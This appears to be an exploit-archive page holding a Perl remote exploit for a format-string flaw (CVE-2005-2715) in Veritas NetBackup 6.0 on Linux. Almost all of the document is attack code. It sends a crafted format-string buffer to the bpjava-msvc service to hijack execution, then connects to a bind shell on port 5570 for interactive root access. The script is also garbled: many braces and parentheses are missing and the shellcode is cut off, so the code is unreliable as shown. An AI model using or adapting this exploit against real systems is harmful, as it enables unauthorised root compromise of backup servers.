Veritas NetBackup 6.0 (Linux) - 'bpjava-msvc' Remote Command Execution

Related Vulnerabilities: CVE-2005-2715  
Publish Date: 20 Oct 2005

# - VERITAS NetBackup Format Strings Linux/x86 Remote Exploit
# johnh[at]digitalmunition[dot]com
# bug found by kf_lists[at]digitalmunition[dot]com

use POSIX;
use IO::Socket;
use IO::Select;
use strict;

print STDERR "\ - VERITAS NetBackup Format Strings Linux/x86 Remote Exploit\n";

if ($#ARGV == -1) {
        print "Usage:\n\t$0 <hostname> <port>\n\n";
        exit (1);

my $hostName = $ARGV[0];
my $port = $ARGV[1] || 13722;

buildexploit ($hostName, $port);

my $shellport = 5570;
print "[*] Connect to remote shell port\n";
my $sock = IO::Socket::INET->new (
                Proto => "tcp",
                PeerAddr => $hostName,
                PeerPort => $shellport,
                Type => SOCK_STREAM

if (! $sock)
        print "[*] Error, Seems Failed\n";
        exit (0);

print "[*] G0t R00T\n";

StartShell ($sock);

sub buildexploit
		my ($host, $port) = @_;
		my $s = IO::Socket::INET->new (
                	Proto => "tcp",
                	PeerAddr => $host,
               	 	PeerPort => $port,
                	Type => SOCK_STREAM
		if (! $s)
		        print "[*] Could not create socket: $!\n";
		print $s " 118      1\nOWNED BABY\n";
		print scalar <$s>;
		print scalar <$s>;

		my $shellcode = "\x90" x 500 .
		my $retloc = 0x080b50ec; #0x080b53b4;
		my $retaddr = 0x80e0658; # can't use shellcode in stack.
		my $hi = ($retaddr >> 0) & 0xffff;
		my $lo = ($retaddr >> 16) & 0xffff;
		$hi = $hi - 0x28;
		$lo = (0x10000 + $lo + 0x28) - $hi - 0x50;		
		my $align = 3;
		my $buffer = " 101      6\n" . "a" x $align . pack ('l', $retloc) .  pack ('l', $retloc + 2) .
		"%." . $hi . "lx" . "%1694\$hn" .
		"%." . $lo . "lx" . "%1695\$hn" .
		$shellcode . "\n" .
		$shellcode . "\n" .
		"i\n" . "0wned\n" . "y0u\n".
		"boot.ini\n" . "\n";
		print STDERR "Sending " .length($buffer) . " bytes to remote\n";		
		sleep (10);				
		print $s $buffer;
		print scalar <$s>;		
		close $s;

sub StartShell 
        my ($client) = @_;	
	my $sel = IO::Select->new();
	# unbuffered fun.
	select($client); $|++;
	select(STDIN);   $|++;
	select(STDOUT);  $|++;
	while (fileno($client))
		my $fd;
		my @fds = $sel->can_read(1);
		foreach $fd (@fds)
			my $in = <$fd>;
			if (! $in || ! $fd || ! $client)
				print "[*] Closing connection.\n";
			if ($fd eq $client)
				print STDOUT $in;
				} else {
					print $client $in;
		close ($client);
		exit (0);

sub Unblock {
        my $fd = shift;
        my $flags;
        $flags = fcntl($fd,F_GETFL,0) || die "Can't get flags for file handle: $!\n";
        fcntl($fd, F_SETFL, $flags|O_NONBLOCK) || die "Can't make handle nonblocking: $!\n";

# [2005-10-20]